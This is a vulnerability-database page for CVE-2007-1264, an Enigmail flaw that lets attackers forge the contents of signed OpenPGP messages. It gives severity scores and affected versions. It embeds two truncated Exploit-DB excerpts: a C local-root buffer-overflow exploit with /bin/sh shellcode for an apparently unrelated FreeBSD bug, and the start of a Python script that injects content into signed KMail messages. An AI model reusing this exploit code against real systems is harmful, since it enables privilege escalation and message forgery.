CVE-2007-1264
published 2007-03-06CVE-2007-1264: Enigmail 0.94.2 and earlier does not properly use the --status-fd argument when invoking GnuPG, which prevents Enigmail from visually distinguishing between…
PriorityP429medium5CVSS 2.0
AVNACLAuNCNIPAN
EXPLOIT
EPSS
4.60%
90.5th percentile
Enigmail 0.94.2 and earlier does not properly use the --status-fd argument when invoking GnuPG, which prevents Enigmail from visually distinguishing between signed and unsigned portions of OpenPGP messages with multiple components, which allows remote attackers to forge the contents of a message without detection.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | enigmail | < enigmail 2:0.95.0+1-1 (bullseye) | enigmail 2:0.95.0+1-1 (bullseye) |
| enigmail | enigmail | <= 0.94.2 | — |
| enigmail | enigmail | >= 0 < 2:0.95.0+1-1 | 2:0.95.0+1-1 |
CVSS provenance
nvdv2.05.0MEDIUMAV:N/AC:L/Au:N/C:N/I:P/A:N
osv5.0MEDIUM
vendor_debian5.0LOW
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-7hv8-mc2f-v257: Enigmail 0
ghsa_unreviewed·2022-05-01
CVE-2007-1264 [MEDIUM] GHSA-7hv8-mc2f-v257: Enigmail 0
Enigmail 0.94.2 and earlier does not properly use the --status-fd argument when invoking GnuPG, which prevents Enigmail from visually distinguishing between signed and unsigned portions of OpenPGP messages with multiple components, which allows remote attackers to forge the contents of a message without detection.
OSV
CVE-2007-1264: Enigmail 0
osv·2007-03-06·CVSS 5.0
CVE-2007-1264 [MEDIUM] CVE-2007-1264: Enigmail 0
Enigmail 0.94.2 and earlier does not properly use the --status-fd argument when invoking GnuPG, which prevents Enigmail from visually distinguishing between signed and unsigned portions of OpenPGP messages with multiple components, which allows remote attackers to forge the contents of a message without detection.
Debian
CVE-2007-1264: enigmail - Enigmail 0.94.2 and earlier does not properly use the --status-fd argument when ...
vendor_debian·2007·CVSS 5.0
CVE-2007-1264 [MEDIUM] CVE-2007-1264: enigmail - Enigmail 0.94.2 and earlier does not properly use the --status-fd argument when ...
Enigmail 0.94.2 and earlier does not properly use the --status-fd argument when invoking GnuPG, which prevents Enigmail from visually distinguishing between signed and unsigned portions of OpenPGP messages with multiple components, which allows remote attackers to forge the contents of a message without detection.
Scope: local
bullseye: resolved (fixed in 2:0.95.0+1-1)
No detection rules found.
Exploit-DB
FreeBSD mcweject 0.9 'Eject' - Local Buffer Overflow / Local Privilege Escalation
exploitdb·2007-03-26
CVE-2007-1719 FreeBSD mcweject 0.9 'Eject' - Local Buffer Overflow / Local Privilege Escalation
FreeBSD mcweject 0.9 'Eject' - Local Buffer Overflow / Local Privilege Escalation
---
// ejecsploit.c - local root exploit for bsd's eject.c
// harry
// vuln found by kokanin (you 31337!!! ;))
// thanks to sacrine and all the other netric guys!!! you rule :)
#include
#include
#include
#include
#define LEN 1264
#define NOP 0x90
extern char** environ;
int main(){
char buf[LEN];
char* ptr;
char* arg[4];
unsigned int ret, i;
char shellcode[]="\xeb\x17\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89"
"\x43\x0c\x50\x8d\x53\x08\x52\x53\xb0\x3b\x50\xcd"
"\x80\xe8\xe4\xff\xff\xff/bin/sh";
// hardcoded... too boneidle to fix this
ret = 0xbfbfee16;
char envshell[4096];
ptr = envshell;
for (i = 0; i > 8);
buf[LEN-3] = (char) ((0x00ff0000 & ret) >> 16);
buf[LEN-2] = (char) ((0xff000000 & ret) >> 24);
bu
Exploit-DB
KMail 1.x - GnuPG Arbitrary Content Injection
exploitdb·2007-03-05
CVE-2007-1264 KMail 1.x - GnuPG Arbitrary Content Injection
KMail 1.x - GnuPG Arbitrary Content Injection
---
source: https://www.securityfocus.com/bid/22759/info
KMail is prone to a vulnerability that may allow an attacker to add arbitrary content into a message without the end user knowing.
An attacker may be able to exploit this issue to add arbitrary content into a GnuPG signed and/or encrypted message.
This vulnerability is due to the weakness discussed in BID 22757 (GnuPG Signed Message Arbitrary Content Injection Weakness) and has been assigned its own BID because of the specific way that KMail uses GnuPG.
This issue affects KMail versions prior to and including 1.9.5.
#!/usr/bin/python
import os, gpg, sys, base64
clear_sign = open(sys.argv[1], "rb").read().splitlines()
start = clear_sign.index("-----BEGIN PGP SIGNED MESSAGE-----")
No writeups or analysis indexed.
http://lists.gnupg.org/pipermail/gnupg-users/2007-March/030514.htmlhttp://secunia.com/advisories/24416http://securityreason.com/securityalert/2353http://www.coresecurity.com/?action=item&id=1687http://www.securityfocus.com/archive/1/461958/100/0/threadedhttp://www.securityfocus.com/archive/1/461958/30/7710/threadedhttp://www.securityfocus.com/bid/22758http://www.securitytracker.com/id?1017727http://www.vupen.com/english/advisories/2007/0835http://lists.gnupg.org/pipermail/gnupg-users/2007-March/030514.htmlhttp://secunia.com/advisories/24416http://securityreason.com/securityalert/2353http://www.coresecurity.com/?action=item&id=1687http://www.securityfocus.com/archive/1/461958/100/0/threadedhttp://www.securityfocus.com/archive/1/461958/30/7710/threadedhttp://www.securityfocus.com/bid/22758http://www.securitytracker.com/id?1017727http://www.vupen.com/english/advisories/2007/0835
2007-03-06
Published